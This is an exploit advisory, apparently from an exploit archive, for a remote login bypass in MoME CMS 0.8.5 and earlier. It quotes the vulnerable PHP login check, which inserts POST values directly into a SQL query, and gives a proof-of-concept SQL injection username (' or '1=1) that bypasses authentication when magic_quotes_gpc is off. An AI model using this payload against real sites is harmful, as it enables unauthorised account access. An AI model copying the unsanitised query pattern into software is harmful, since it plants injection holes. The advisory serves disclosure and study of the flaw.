id: 10677
date: 01/16/2010
title: MoME CMS <= 0.8.5 Remote Login Bypass Exploit
author: cr4wl3r
cves: 

=============================================
MoME CMS <= 0.8.5 Remote Login Bypass Exploit
=============================================

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |    MoME CMS <= 0.8.5 Remote Login Bypass Exploit   |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------
 
[!] Discovered: cr4wl3r 
[!] Download: http://sourceforge.net/projects/mome/files/
[!] Date: 16.01.2010
[!] Remote: yes
 
 
[!] Code :
 
 
//controllo user e passwd da login
 if(isset($_POST['posted_username']) && isset($_POST['posted_password'])) {
        $query="SELECT * FROM users WHERE username='$_POST[posted_username]' AND
password=md5('$_POST[posted_password]')";
 
 
[!] PoC:
 
    username : ' or '1=1
    password : cr4wl3r



#  0day.today [2023-03-23]  #